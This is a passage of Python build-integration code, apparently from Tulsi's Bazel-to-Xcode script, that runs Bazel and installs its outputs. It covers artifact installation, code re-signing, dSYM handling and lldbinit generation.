clear_source_map = dsym_paths or self.direct_debug_prefix_map
exit_code = self._UpdateLLDBInit(clear_source_map)
timer.End()
if exit_code:
_PrintXcodeWarning('Updating .lldbinit action failed with code %d' %
exit_code)
post_bazel_timer.End(log_absolute_times=True)
return 0
def _BuildBazelCommand(self, options):
"""Builds up a commandline string suitable for running Bazel."""
configuration = os.environ['CONFIGURATION']
# Treat the special testrunner build config as a Debug compile.
test_runner_config_prefix = '__TulsiTestRunner_'
if configuration.startswith(test_runner_config_prefix):
configuration = configuration[len(test_runner_config_prefix):]
elif os.environ.get('TULSI_TEST_RUNNER_ONLY') == 'YES':
_PrintXcodeError('Building test targets with configuration "%s" is not '
'allowed. Please use the "Test" action or "Build for" > '
'"Testing" instead.' % configuration)
return (None, 1)
if configuration not in _OptionsParser.KNOWN_CONFIGS:
_PrintXcodeError('Unknown build configuration "%s"' % configuration)
return (None, 1)
bazel, start_up, build = options.GetBazelOptions(configuration)
bazel_command = [bazel]
bazel_command.extend(start_up)
bazel_command.append('build')
bazel_command.extend(build)
bazel_command.extend([
# The following flags are used by Tulsi to identify itself and read
        # build information from Bazel. They should not affect Bazel analysis
# caching.
'--tool_tag=tulsi:bazel_build',
'--build_event_json_file=%s' % self.build_events_file_path,
'--noexperimental_build_event_json_file_path_conversion',
'--aspects', '@tulsi//:tulsi/tulsi_aspects.bzl%tulsi_outputs_aspect'])
if self.is_test and self.gen_runfiles:
bazel_command.append('--output_groups=+tulsi_outputs')
else:
bazel_command.append('--output_groups=tulsi_outputs,default')
bazel_command.extend(options.targets)
extra_options = bazel_options.BazelOptions(os.environ)
bazel_command.extend(extra_options.bazel_feature_flags())
return (bazel_command, 0)
def _RunBazelAndPatchOutput(self, command):
"""Runs subprocess command, patching output as it's received."""
self._PrintVerbose('Running "%s", patching output for workspace root at '
'"%s" with project path at "%s".' %
(' '.join([pipes.quote(x) for x in command]),
self.workspace_root,
self.project_dir))
# Clean up bazel output to make it look better in Xcode.
bazel_line_regex = re.compile(
r'(INFO|DEBUG|WARNING|ERROR|FAILED): ([^:]+:\d+:(?:\d+:)?)\s+(.+)')
bazel_generic_regex = re.compile(r'(INFO|DEBUG|WARNING|ERROR|FAILED): (.*)')
def PatchBazelDiagnosticStatements(output_line):
"""Make Bazel output more Xcode friendly."""
def BazelLabelToXcodeLabel(bazel_label):
"""Map Bazel labels to xcode labels for build output."""
xcode_labels = {
'INFO': 'note',
'DEBUG': 'note',
'WARNING': 'warning',
'ERROR': 'error',
'FAILED': 'error'
}
return xcode_labels.get(bazel_label, bazel_label)
match = bazel_line_regex.match(output_line)
if match:
xcode_label = BazelLabelToXcodeLabel(match.group(1))
output_line = '%s %s: %s' % (match.group(2), xcode_label,
match.group(3))
else:
match = bazel_generic_regex.match(output_line)
if match:
xcode_label = BazelLabelToXcodeLabel(match.group(1))
output_line = '%s: %s' % (xcode_label, match.group(2))
return output_line
if self.workspace_root != self.project_dir:
# Match (likely) filename:line_number: lines.
xcode_parsable_line_regex = re.compile(r'([^/][^:]+):\d+:')
def PatchOutputLine(output_line):
output_line = PatchBazelDiagnosticStatements(output_line)
if xcode_parsable_line_regex.match(output_line):
output_line = '%s/%s' % (self.workspace_root, output_line)
return output_line
patch_xcode_parsable_line = PatchOutputLine
else:
patch_xcode_parsable_line = PatchBazelDiagnosticStatements
def HandleOutput(output):
for line in output.splitlines():
_logger.log_bazel_message(patch_xcode_parsable_line(line))
def WatcherUpdate(watcher):
"""Processes any new events in the given watcher.
Args:
watcher: a BazelBuildEventsWatcher object.
Returns:
A list of new tulsiout file names seen.
"""
new_events = watcher.check_for_new_events()
new_outputs = []
for build_event in new_events:
if build_event.stderr:
HandleOutput(build_event.stderr)
if build_event.stdout:
HandleOutput(build_event.stdout)
if build_event.files:
outputs = [x for x in build_event.files if x.endswith('.tulsiouts')]
new_outputs.extend(outputs)
return new_outputs
def ReaderThread(file_handle, out_buffer):
out_buffer.append(file_handle.read())
file_handle.close()
# Make sure the BEP JSON file exists and is empty. We do this to prevent
# any sort of race between the watcher, bazel, and the old file contents.
open(self.build_events_file_path, 'w').close()
# Capture the stderr and stdout from Bazel. We only display it if it we're
# unable to read any BEP events.
process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1)
# Register atexit function to clean up BEP file.
atexit.register(_BEPFileExitCleanup, self.build_events_file_path)
global CLEANUP_BEP_FILE_AT_EXIT
CLEANUP_BEP_FILE_AT_EXIT = True
# Start capturing output from Bazel.
reader_buffer = []
reader_thread = threading.Thread(target=ReaderThread,
args=(process.stdout, reader_buffer))
reader_thread.daemon = True
reader_thread.start()
with io.open(self.build_events_file_path, 'r', -1, 'utf-8', 'ignore'
) as bep_file:
watcher = bazel_build_events.BazelBuildEventsWatcher(bep_file,
_PrintXcodeWarning)
output_locations = []
while process.returncode is None:
output_locations.extend(WatcherUpdate(watcher))
time.sleep(0.1)
process.poll()
output_locations.extend(WatcherUpdate(watcher))
# If BEP JSON parsing failed, we should display the raw stdout and
# stderr from Bazel.
reader_thread.join()
if not watcher.has_read_events():
HandleOutput(reader_buffer[0])
if process.returncode == 0 and not output_locations:
CLEANUP_BEP_FILE_AT_EXIT = False
        _PrintXcodeError('Unable to find location of the .tulsiouts file. '
                         'Please report this as a Tulsi bug, including the '
                         'contents of %s.' % self.build_events_file_path)
return 1, output_locations
return process.returncode, output_locations
def _ExtractAspectOutputsData(self, output_files):
"""Converts aspect output from paths to json to a list of dictionaries.
Args:
output_files: A list of strings to files representing Bazel aspect output
in UTF-8 JSON format.
Returns:
return_code, [dict]: A tuple with a return code as its first argument and
for its second argument, a list of dictionaries for
each output_file that could be interpreted as valid
JSON, representing the returned Bazel aspect
information.
return_code, None: If an error occurred while converting the list of
files into JSON.
"""
outputs_data = []
for output_file in output_files:
try:
output_data = json.load(open(output_file))
except (ValueError, IOError) as e:
        _PrintXcodeError('Failed to load output map "%s". '
'%s' % (output_file, e))
return 600, None
outputs_data.append(output_data)
return 0, outputs_data
def _InstallArtifact(self, outputs_data):
"""Installs Bazel-generated artifacts into the Xcode output directory."""
xcode_artifact_path = self.artifact_output_path
if not outputs_data:
_PrintXcodeError('Failed to load top level output file.')
return 600
primary_output_data = outputs_data[0]
if 'artifact' not in primary_output_data:
_PrintXcodeError(
'Failed to find an output artifact for target %s in output map %r' %
(xcode_artifact_path, primary_output_data))
return 601
primary_artifact = primary_output_data['artifact']
artifact_archive_root = primary_output_data.get('archive_root')
bundle_name = primary_output_data.get('bundle_name')
# The PRODUCT_NAME used by the Xcode project is not trustable as it may be
# modified by the user and, more importantly, may have been modified by
# Tulsi to disambiguate multiple targets with the same name.
self.bazel_product_name = bundle_name
# We need to handle IPAs (from {ios, tvos}_application) differently from
# ZIPs (from the other bundled rules) because they output slightly different
# directory structures.
is_ipa = primary_artifact.endswith('.ipa')
is_zip = primary_artifact.endswith('.zip')
if is_ipa or is_zip:
expected_bundle_name = bundle_name + self.wrapper_suffix
# The directory structure within the IPA is then determined based on
# Bazel's package and/or product type.
if is_ipa:
bundle_subpath = os.path.join('Payload', expected_bundle_name)
else:
# If the artifact is a ZIP, assume that the bundle is the top-level
# directory (this is the way in which Skylark rules package artifacts
# that are not standalone IPAs).
bundle_subpath = expected_bundle_name
# Prefer to copy over files from the archive root instead of unzipping the
# ipa/zip in order to help preserve timestamps. Note that the archive root
# is only present for local builds; for remote builds we must extract from
# the zip file.
if self._IsValidArtifactArchiveRoot(artifact_archive_root, bundle_name):
source_location = os.path.join(artifact_archive_root, bundle_subpath)
exit_code = self._RsyncBundle(os.path.basename(primary_artifact),
source_location,
xcode_artifact_path)
else:
exit_code = self._UnpackTarget(primary_artifact,
xcode_artifact_path,
bundle_subpath)
if exit_code:
return exit_code
elif os.path.isfile(primary_artifact):
# Remove the old artifact before copying.
if os.path.isfile(xcode_artifact_path):
try:
os.remove(xcode_artifact_path)
except OSError as e:
_PrintXcodeError('Failed to remove stale output file "%s". '
'%s' % (xcode_artifact_path, e))
return 600
exit_code = self._CopyFile(os.path.basename(primary_artifact),
primary_artifact,
xcode_artifact_path)
if exit_code:
return exit_code
else:
self._RsyncBundle(os.path.basename(primary_artifact),
primary_artifact,
xcode_artifact_path)
# When the rules output a tree artifact, Tulsi will copy the bundle as is
# into the expected Xcode output location. But because they're copied as
# is from the bazel output, they come with bazel's permissions, which are
# read only. Here we set them to write as well, so Xcode can modify the
# bundle too (for example, for codesigning).
chmod_timer = Timer('Modifying permissions of output bundle',
'bundle_chmod').Start()
self._PrintVerbose('Spawning subprocess to add write permissions to '
'copied bundle...')
process = subprocess.Popen(['chmod', '-R', 'uga+w', xcode_artifact_path])
process.wait()
chmod_timer.End()
# No return code check as this is not an essential operation.
self._InstallEmbeddedBundlesIfNecessary(primary_output_data)
return 0
def _IsValidArtifactArchiveRoot(self, archive_root, bundle_name):
"""Returns true if the archive root is valid for use."""
if not archive_root or not os.path.isdir(archive_root):
return False
# The archive root will not be updated for any remote builds, but will be
# valid for local builds. We detect this by using an implementation detail
# of the rules_apple bundler: archives will always be transformed from
# <name>.unprocessed.zip (locally or remotely) to <name>.archive-root.
#
# Thus if the mod time on the archive root is not greater than the mod
# time on the zip, the archive root is not valid. Remote builds
# will end up copying the <name>.unprocessed.zip but not the
# <name>.archive-root, making this a valid temporary solution.
#
# In the future, it would be better to have this handled by the rules;
# until then this should suffice as a work around to improve build times.
unprocessed_zip = os.path.join(os.path.dirname(archive_root),
'%s.unprocessed.zip' % bundle_name)
if not os.path.isfile(unprocessed_zip):
return False
return os.path.getmtime(archive_root) > os.path.getmtime(unprocessed_zip)
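# Illustrative example of the check above (hypothetical paths): with
# bundle_name 'MyApp' and archive_root '/.../bin/app/MyApp.archive-root',
# the sibling zip consulted is '/.../bin/app/MyApp.unprocessed.zip'; the
# archive root is only treated as valid when its mtime is strictly newer
# than that zip's.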
def _InstallEmbeddedBundlesIfNecessary(self, output_data):
"""Install embedded bundles next to the current target's output."""
# In order to find and load symbols for the binary installed on device,
# Instruments needs to "see" it in Spotlight index somewhere on the local
# filesystem. This is only needed for on-device instrumentation.
#
# Unfortunately, it does not seem to be possible to detect when a build is
# being made for profiling, thus we can't exclude this step for on-device
# non-profiling builds.
if self.is_simulator or ('embedded_bundles' not in output_data):
return
timer = Timer('Installing embedded bundles',
'installing_embedded_bundles').Start()
for bundle_info in output_data['embedded_bundles']:
bundle_name = bundle_info['bundle_name']
bundle_extension = bundle_info['bundle_extension']
full_name = bundle_name + bundle_extension
output_path = os.path.join(self.built_products_dir, full_name)
# TODO(b/68936732): See if copying just the binary (not the whole bundle)
# is enough to make Instruments work.
if self._IsValidArtifactArchiveRoot(bundle_info['archive_root'],
bundle_name):
source_path = os.path.join(bundle_info['archive_root'], full_name)
self._RsyncBundle(full_name, source_path, output_path)
else:
# Try to find the embedded bundle within the installed main bundle.
bundle_path = self._FindEmbeddedBundleInMain(bundle_name,
bundle_extension)
if bundle_path:
self._RsyncBundle(full_name, bundle_path, output_path)
else:
_PrintXcodeWarning('Could not find bundle %s in main bundle. ' %
(full_name) +
'Device-level Instruments debugging will be '
'disabled for this bundle. Please report a '
'Tulsi bug and attach a full Xcode build log.')
timer.End()
# Maps extensions to anticipated subfolders.
_EMBEDDED_BUNDLE_PATHS = {
'.appex': 'PlugIns',
'.framework': 'Frameworks'
}
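# For example, an embedded 'Foo.framework' is expected at
# <bundle>/Frameworks/Foo.framework and a 'Bar.appex' at
# <bundle>/PlugIns/Bar.appex (names are hypothetical).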
def _FindEmbeddedBundleInMain(self, bundle_name, bundle_extension):
"""Retrieves the first embedded bundle found within our main bundle."""
main_bundle = os.environ.get('EXECUTABLE_FOLDER_PATH')
if not main_bundle:
return None
main_bundle_path = os.path.join(self.built_products_dir,
main_bundle)
return self._FindEmbeddedBundle(bundle_name,
bundle_extension,
main_bundle_path)
def _FindEmbeddedBundle(self, bundle_name, bundle_extension, bundle_path):
"""Retrieves the first embedded bundle found within this bundle path."""
embedded_subfolder = self._EMBEDDED_BUNDLE_PATHS.get(bundle_extension)
if not embedded_subfolder:
return None
projected_bundle_path = os.path.join(bundle_path,
embedded_subfolder,
bundle_name + bundle_extension)
if os.path.isdir(projected_bundle_path):
return projected_bundle_path
# For frameworks not in the main app bundle, and possibly other executable
# bundle content in the future, we recurse through every .appex in PlugIns
# to find those frameworks.
#
# This won't support frameworks that could potentially have the same name
# but are different between the app and extensions, but we intentionally
# choose not to handle that case. Xcode's build system only supports
# uniquely named frameworks, and we shouldn't confuse the dynamic loader
# with frameworks that have the same image names but different content.
appex_root_path = os.path.join(bundle_path, 'PlugIns')
if not os.path.isdir(appex_root_path):
return None
# Find each directory within appex_root_path and attempt to find a bundle.
# If one can't be found, return None.
appex_dirs = os.listdir(appex_root_path)
for appex_dir in appex_dirs:
appex_path = os.path.join(appex_root_path, appex_dir)
path = self._FindEmbeddedBundle(bundle_name,
bundle_extension,
appex_path)
if path:
return path
return None
def _InstallGeneratedHeaders(self, outputs):
"""Invokes install_genfiles.py to install generated Bazel files."""
genfiles_timer = Timer('Installing generated headers',
'installing_generated_headers').Start()
# Resolve the path to the install_genfiles.py script.
# It should be in the same directory as this script.
path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'install_genfiles.py')
args = [path, self.bazel_exec_root]
args.extend(outputs)
self._PrintVerbose('Spawning subprocess install_genfiles.py to copy '
'generated files in the background...')
process = subprocess.Popen(args)
process.wait()
genfiles_timer.End()
def _InstallBundle(self, source_path, output_path):
"""Copies the bundle at source_path to output_path."""
if not os.path.isdir(source_path):
return 0, None
if os.path.isdir(output_path):
try:
shutil.rmtree(output_path)
except OSError as e:
_PrintXcodeError('Failed to remove stale bundle "%s". '
'%s' % (output_path, e))
return 700, None
exit_code = self._CopyBundle(os.path.basename(source_path),
source_path,
output_path)
return exit_code, output_path
def _RsyncBundle(self, source_path, full_source_path, output_path):
"""Rsyncs the given bundle to the given expected output path."""
self._PrintVerbose('Rsyncing %s to %s' % (source_path, output_path))
# rsync behavior changes based on presence of a trailing slash.
if not full_source_path.endswith('/'):
full_source_path += '/'
try:
# Use -c to check differences by checksum, -v for verbose,
# and --delete to delete stale files.
# The rest of the flags are the same as -a but without preserving
# timestamps, which is done intentionally so the timestamp will
# only change when the file is changed.
subprocess.check_output(['rsync',
'-vcrlpgoD',
'--delete',
full_source_path,
output_path],
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
_PrintXcodeError('Rsync failed. %s' % e)
return 650
return 0
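# Note: '-vcrlpgoD' is 'rsync -a' (which expands to '-rlptgoD') plus '-v'
# and '-c', minus '-t' so timestamps are not preserved. A sketch of the
# resulting invocation, with hypothetical paths:
#   rsync -vcrlpgoD --delete /.../MyApp.archive-root/Payload/MyApp.app/ \
#       "$TARGET_BUILD_DIR/MyApp.app"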
def _CopyBundle(self, source_path, full_source_path, output_path):
"""Copies the given bundle to the given expected output path."""
self._PrintVerbose('Copying %s to %s' % (source_path, output_path))
try:
CopyOnWrite(full_source_path, output_path, tree=True)
except OSError as e:
_PrintXcodeError('Copy failed. %s' % e)
return 650
return 0
def _CopyFile(self, source_path, full_source_path, output_path):
"""Copies the given file to the given expected output path."""
self._PrintVerbose('Copying %s to %s' % (source_path, output_path))
output_path_dir = os.path.dirname(output_path)
if not os.path.exists(output_path_dir):
try:
os.makedirs(output_path_dir)
except OSError as e:
_PrintXcodeError('Failed to create output directory "%s". '
'%s' % (output_path_dir, e))
return 650
try:
CopyOnWrite(full_source_path, output_path)
except OSError as e:
_PrintXcodeError('Copy failed. %s' % e)
return 650
return 0
def _UnpackTarget(self, bundle_path, output_path, bundle_subpath):
"""Unpacks generated bundle into the given expected output path."""
self._PrintVerbose('Unpacking %s to %s' % (bundle_path, output_path))
if not os.path.isfile(bundle_path):
_PrintXcodeError('Generated bundle not found at "%s"' % bundle_path)
return 670
if os.path.isdir(output_path):
try:
shutil.rmtree(output_path)
except OSError as e:
_PrintXcodeError('Failed to remove stale output directory "%s". '
'%s' % (output_path, e))
return 600
# We need to handle IPAs (from {ios, tvos}_application) differently from
# ZIPs (from the other bundled rules) because they output slightly different
# directory structures.
is_ipa = bundle_path.endswith('.ipa')
with zipfile.ZipFile(bundle_path, 'r') as zf:
for item in zf.infolist():
filename = item.filename
# Support directories do not seem to be needed by the debugger and are
# skipped.
basedir = filename.split(os.sep)[0]
if basedir.endswith('Support') or basedir.endswith('Support2'):
continue
if len(filename) < len(bundle_subpath):
continue
attributes = (item.external_attr >> 16) & 0o777
self._PrintVerbose('Extracting %s (%o)' % (filename, attributes),
level=1)
if not filename.startswith(bundle_subpath):
_PrintXcodeWarning('Mismatched extraction path. Bundle content '
'at "%s" expected to have subpath of "%s"' %
(filename, bundle_subpath))
dir_components = self._SplitPathComponents(filename)
# Get the file's path, ignoring the payload components if the archive
# is an IPA.
if is_ipa:
subpath = os.path.join(*dir_components[2:])
else:
subpath = os.path.join(*dir_components[1:])
target_path = os.path.join(output_path, subpath)
# Ensure the target directory exists.
try:
target_dir = os.path.dirname(target_path)
if not os.path.isdir(target_dir):
os.makedirs(target_dir)
except OSError as e:
_PrintXcodeError(
'Failed to create target path "%s" during extraction. %s' % (
target_path, e))
return 671
# If the archive item looks like a file, extract it.
if not filename.endswith(os.sep):
with zf.open(item) as src, open(target_path, 'wb') as dst:
shutil.copyfileobj(src, dst)
# Patch up the extracted file's attributes to match the zip content.
if attributes:
os.chmod(target_path, attributes)
return 0
def _InstallDSYMBundles(self, output_dir, outputs_data):
"""Copies any generated dSYM bundles to the given directory."""
dsym_to_process = set()
primary_output_data = outputs_data[0]
if primary_output_data['has_dsym']:
# Declares the Xcode-generated name of our main target's dSYM.
# This environment variable is always set, for any possible Xcode output
# that could generate a dSYM bundle.
#
# Note that this may differ from the Bazel name as Tulsi may modify the
# Xcode `BUNDLE_NAME`, so we need to make sure we use Bazel as the source
# of truth for Bazel's dSYM name, but copy it over to where Xcode expects.
xcode_target_dsym = os.environ.get('DWARF_DSYM_FILE_NAME')
if xcode_target_dsym:
dsym_path = primary_output_data.get('dsym_path')
if dsym_path:
dsym_to_process.add((dsym_path, xcode_target_dsym))
else:
_PrintXcodeWarning('Unable to resolve dSYM paths for main bundle %s' %
primary_output_data)
# Collect additional dSYM bundles generated by the dependencies of this
# build such as extensions or frameworks. Note that a main target may not
# have dSYMs while subtargets (like an xctest) still can have them.
child_dsyms = set()
for data in outputs_data:
for bundle_info in data.get('embedded_bundles', []):
if not bundle_info['has_dsym']:
continue
dsym_path = bundle_info.get('dsym_path')
if dsym_path:
child_dsyms.add((dsym_path, os.path.basename(dsym_path)))
else:
_PrintXcodeWarning(
'Unable to resolve dSYM paths for embedded bundle %s'
% bundle_info)
dsym_to_process.update(child_dsyms)
if not dsym_to_process:
return 0, None
# Start the timer now that we know we have dSYM bundles to install.
timer = Timer('Installing dSYM bundles', 'installing_dsym').Start()
dsyms_found = []
for input_dsym_full_path, xcode_dsym_name in dsym_to_process:
output_full_path = os.path.join(output_dir, xcode_dsym_name)
exit_code, path = self._InstallBundle(input_dsym_full_path,
output_full_path)
if exit_code:
_PrintXcodeWarning('Failed to install dSYM to "%s" (%s)'
% (input_dsym_full_path, exit_code))
elif path is None:
_PrintXcodeWarning('Did not find a dSYM bundle at %s'
% input_dsym_full_path)
else:
dsyms_found.append(path)
timer.End()
return 0, dsyms_found
def _ResignBundle(self, bundle_path, signing_identity, entitlements=None):
"""Re-signs the bundle with the given signing identity and entitlements."""
if not self.codesigning_allowed:
return 0
timer = Timer('\tSigning ' + bundle_path, 'signing_bundle').Start()
command = [
'xcrun',
'codesign',
'-f',
'--timestamp=none',
'-s',
signing_identity,
]
if entitlements:
command.extend(['--entitlements', entitlements])
else:
command.append('--preserve-metadata=entitlements')
command.append(bundle_path)
returncode, output = self._RunSubprocess(command)
timer.End()
if returncode:
_PrintXcodeError('Re-sign command %r failed. %s' % (command, output))
return 800 + returncode
return 0
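# Illustrative expansion of the command built above (identity, entitlements
# and bundle path are hypothetical):
#   xcrun codesign -f --timestamp=none -s "Apple Development: Jane Doe" \
#       --entitlements MyApp_UIRunner.entitlements /.../MyApp-Runner.app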
def _ResignTestArtifacts(self):
"""Resign test related artifacts that Xcode injected into the outputs."""
if not self.is_test:
return 0
# Extract the signing identity from the bundle at the expected output path
# since that's where the signed bundle from bazel was placed.
signing_identity = self._ExtractSigningIdentity(self.artifact_output_path)
if not signing_identity:
return 800
exit_code = 0
timer = Timer('Re-signing injected test host artifacts',
'resigning_test_host').Start()
if self.test_host_binary:
# For Unit tests, we need to resign the frameworks that Xcode injected
# into the test host bundle.
test_host_bundle = os.path.dirname(self.test_host_binary)
exit_code = self._ResignXcodeTestFrameworks(
test_host_bundle, signing_identity)
else:
# For UI tests, we need to resign the UI test runner app and the
# frameworks that Xcode injected into the runner app. The UI Runner app
# also needs to be signed with entitlements.
exit_code = self._ResignXcodeTestFrameworks(
self.codesigning_folder_path, signing_identity)
if exit_code == 0:
entitlements_path = self._InstantiateUIRunnerEntitlements()
if entitlements_path:
exit_code = self._ResignBundle(
self.codesigning_folder_path,
signing_identity,
entitlements_path)
else:
_PrintXcodeError('Could not instantiate UI runner entitlements.')
exit_code = 800
timer.End()
return exit_code
def _ResignXcodeTestFrameworks(self, bundle, signing_identity):
"""Re-signs the support frameworks injected by Xcode in the given bundle."""
if not self.codesigning_allowed:
return 0
for framework in XCODE_INJECTED_FRAMEWORKS:
framework_path = os.path.join(
bundle, 'Frameworks', framework)
if os.path.isdir(framework_path) or os.path.isfile(framework_path):
exit_code = self._ResignBundle(framework_path, signing_identity)
if exit_code != 0:
return exit_code
return 0
def _InstantiateUIRunnerEntitlements(self):
"""Substitute team and bundle identifiers into UI runner entitlements.
This method throws an IOError exception if the template wasn't found in
its expected location, or an OSError if the expected output folder could
not be created.
Returns:
The path to where the entitlements file was generated.
"""
if not self.codesigning_allowed:
return None
if not os.path.exists(self.derived_sources_folder_path):
os.makedirs(self.derived_sources_folder_path)
output_file = os.path.join(
self.derived_sources_folder_path,
self.bazel_product_name + '_UIRunner.entitlements')
if os.path.exists(output_file):
os.remove(output_file)
with open(self.runner_entitlements_template, 'r') as template:
contents = template.read()
contents = contents.replace(
'$(TeamIdentifier)',
self._ExtractSigningTeamIdentifier(self.artifact_output_path))
contents = contents.replace(
'$(BundleIdentifier)',
self._ExtractSigningBundleIdentifier(self.artifact_output_path))
with open(output_file, 'w') as output:
output.write(contents)
return output_file
def _ExtractSigningIdentity(self, signed_bundle):
"""Returns the identity used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'Authority')
def _ExtractSigningTeamIdentifier(self, signed_bundle):
"""Returns the team identifier used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'TeamIdentifier')
def _ExtractSigningBundleIdentifier(self, signed_bundle):
"""Returns the bundle identifier used to sign the given bundle path."""
return self._ExtractSigningAttribute(signed_bundle, 'Identifier')
def _ExtractSigningAttribute(self, signed_bundle, attribute):
"""Returns the attribute used to sign the given bundle path."""
if not self.codesigning_allowed:
return '<CODE_SIGNING_ALLOWED=NO>'
cached = self.codesign_attributes.get(signed_bundle)
if cached:
return cached.Get(attribute)
timer = Timer('\tExtracting signature for ' + signed_bundle,
'extracting_signature').Start()
output = subprocess.check_output(['xcrun',
'codesign',
'-dvv',
signed_bundle],
stderr=subprocess.STDOUT)
timer.End()
bundle_attributes = CodesignBundleAttributes(output)
self.codesign_attributes[signed_bundle] = bundle_attributes
return bundle_attributes.Get(attribute)
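# The attributes parsed here come from 'xcrun codesign -dvv <bundle>', whose
# output includes lines such as (illustrative values):
#   Identifier=com.example.MyApp
#   TeamIdentifier=ABCDE12345
#   Authority=Apple Development: Jane Doe (ABCDE12345)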
def _UpdateLLDBInit(self, clear_source_map=False):
"""Updates lldbinit to enable debugging of Bazel binaries."""
# An additional lldbinit file that we should load in the lldbinit file
# we are about to write.
additional_lldbinit = None
if self.custom_lldbinit is None:
# Write our settings to the global ~/.lldbinit-tulsiproj file when no
# custom lldbinit is provided.
lldbinit_file = TULSI_LLDBINIT_FILE
# Make sure a reference to ~/.lldbinit-tulsiproj exists in ~/.lldbinit or
# ~/.lldbinit-Xcode. Priority is given to ~/.lldbinit-Xcode if it exists,
# otherwise the bootstrapping will be written to ~/.lldbinit.
BootstrapLLDBInit(True)
else:
# Remove any reference to ~/.lldbinit-tulsiproj if the global lldbinit was
# previously bootstrapped. This prevents the global lldbinit from having
# side effects on the custom lldbinit file.
BootstrapLLDBInit(False)
# When using a custom lldbinit, Xcode will directly load our custom file
# so write our settings to this custom file. Retain standard Xcode
# behavior by loading the default file in our custom file.
lldbinit_file = self.custom_lldbinit
additional_lldbinit = _FindDefaultLldbInit()
project_basename = os.path.basename(self.project_file_path)
workspace_root = self._NormalizePath(self.workspace_root)
with open(lldbinit_file, 'w') as out:
out.write('# This file is autogenerated by Tulsi and should not be '
'edited.\n')
if additional_lldbinit is not None:
out.write('# This loads the default lldbinit file to retain standard '
'Xcode behavior.\n')
out.write('command source "%s"\n' % additional_lldbinit)
out.write('# This sets lldb\'s working directory to the Bazel workspace '
'root used by %r.\n' % project_basename)
out.write('platform settings -w "%s"\n' % workspace_root)
if clear_source_map:
out.write('settings clear target.source-map\n')
return 0
if self.normalized_prefix_map:
source_map = ('./', workspace_root)
out.write('# This maps the normalized root to that used by '
'%r.\n' % project_basename)
else:
# NOTE: settings target.source-map is different from
# DBGSourcePathRemapping; the former is an LLDB target-level
# remapping API that rewrites breakpoints, the latter is an LLDB
# module-level remapping API that changes DWARF debug info in memory.
#
# If we had multiple remappings, it would not make sense for the
# two APIs to share the same mappings. They have very different
# side-effects in how they individually handle debug information.
source_map = self._ExtractTargetSourceMap()
out.write('# This maps Bazel\'s execution root to that used by '
'%r.\n' % project_basename)
out.write('settings set target.source-map "%s" "%s"\n' % source_map)
return 0
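# A generated lldbinit might look roughly like this, assuming no custom
# lldbinit, no prefix map, and hypothetical paths:
#   # This file is autogenerated by Tulsi and should not be edited.
#   # This sets lldb's working directory to the Bazel workspace root used by 'MyApp.xcodeproj'.
#   platform settings -w "/Users/dev/myapp/"
#   # This maps Bazel's execution root to that used by 'MyApp.xcodeproj'.
#   settings set target.source-map "/private/var/tmp/_bazel_dev/1234/execroot/myapp/" "/Users/dev/myapp/"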
def _DWARFdSYMBinaries(self, dsym_bundle_path):
"""Returns an array of abs paths to DWARF binaries in the dSYM bundle.
Args:
dsym_bundle_path: absolute path to the dSYM bundle.
Returns:
str[]: a list of strings representing the absolute paths to each binary
found within the dSYM bundle.
"""
dwarf_dir = os.path.join(dsym_bundle_path,
'Contents',
'Resources',
'DWARF')
dsym_binaries = []
for f in os.listdir(dwarf_dir):
# Ignore hidden files, such as .DS_Store files.
if not f.startswith('.'):
# Append full path info.
dsym_binary = os.path.join(dwarf_dir, f)
dsym_binaries.append(dsym_binary)
return dsym_binaries
def _UUIDInfoForBinary(self, source_binary_path):
"""Returns exit code of dwarfdump along with every UUID + arch found.
Args:
source_binary_path: absolute path to the binary file.
Returns:
(Int, str[(str, str)]): a tuple containing the return code of dwarfdump
as its first element, and a list of strings
representing each UUID found for each given
binary slice found within the binary with its
given architecture, if no error has occurred.
"""
returncode, output = self._RunSubprocess([
'xcrun',
'dwarfdump',
'--uuid',
source_binary_path
])
if returncode:
_PrintXcodeWarning('dwarfdump returned %d while finding the UUID for %s'
% (returncode, source_binary_path))
return (returncode, [])
# Each line of output reports the UUID as its second whitespace-separated
# token, e.g. "UUID: D4DE5AA2-79EE-36FE-980C-755AED318308 (x86_64)
# /Applications/Calendar.app/Contents/MacOS/Calendar".
uuids_found = []
for dwarfdump_output in output.split('\n'):
if not dwarfdump_output:
continue
found_output = re.match(r'^(?:UUID: )([^ ]+) \(([^)]+)', dwarfdump_output)
if not found_output:
continue
found_uuid = found_output.group(1)
if not found_uuid:
continue
found_arch = found_output.group(2)
if not found_arch:
continue
uuids_found.append((found_uuid, found_arch))
return (0, uuids_found)
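# Example parse of the sample line quoted above: the regex captures
# group(1) = 'D4DE5AA2-79EE-36FE-980C-755AED318308' and group(2) = 'x86_64',
# so uuids_found would contain that single (uuid, arch) pair.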
def _CreateUUIDPlist(self, dsym_bundle_path, uuid, arch, source_maps):
"""Creates a UUID.plist in a dSYM bundle to redirect sources.
Args:
dsym_bundle_path: absolute path to the dSYM bundle.
uuid: string representing the UUID of the binary slice with paths to
remap in the dSYM bundle.
arch: the architecture of the binary slice.
source_maps: list of tuples representing all absolute paths to source
files compiled by Bazel as strings ($0) associated with the
paths to Xcode-visible sources used for the purposes of
Tulsi debugging as strings ($1).
Returns:
Bool: True if no error was found, or False, representing a failure to
write when creating the plist.
"""
# Create a UUID plist at (dsym_bundle_path)/Contents/Resources/.
remap_plist = os.path.join(dsym_bundle_path,
'Contents',
'Resources',
'%s.plist' % uuid)
# Via an XML plist, add the mappings from _ExtractTargetSourceMap().
try:
with open(remap_plist, 'w') as out:
out.write('<?xml version="1.0" encoding="UTF-8"?>\n'
'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
'<plist version="1.0">\n'
'<dict>\n'
'<key>DBGSourcePathRemapping</key>\n'
'<dict>\n')
for source_map in source_maps:
# Add the mapping as a DBGSourcePathRemapping to the UUID plist here.
out.write('<key>%s</key>\n<string>%s</string>\n' % source_map)
# Make sure that we also set DBGVersion to 3.
out.write('</dict>\n'
'<key>DBGVersion</key>\n'
'<string>3</string>\n'
'</dict>\n'
'</plist>\n')
except OSError as e:
_PrintXcodeError('Failed to write %s, received error %s' %
(remap_plist, e))
return False
# Update the dSYM symbol cache with a reference to this dSYM bundle.
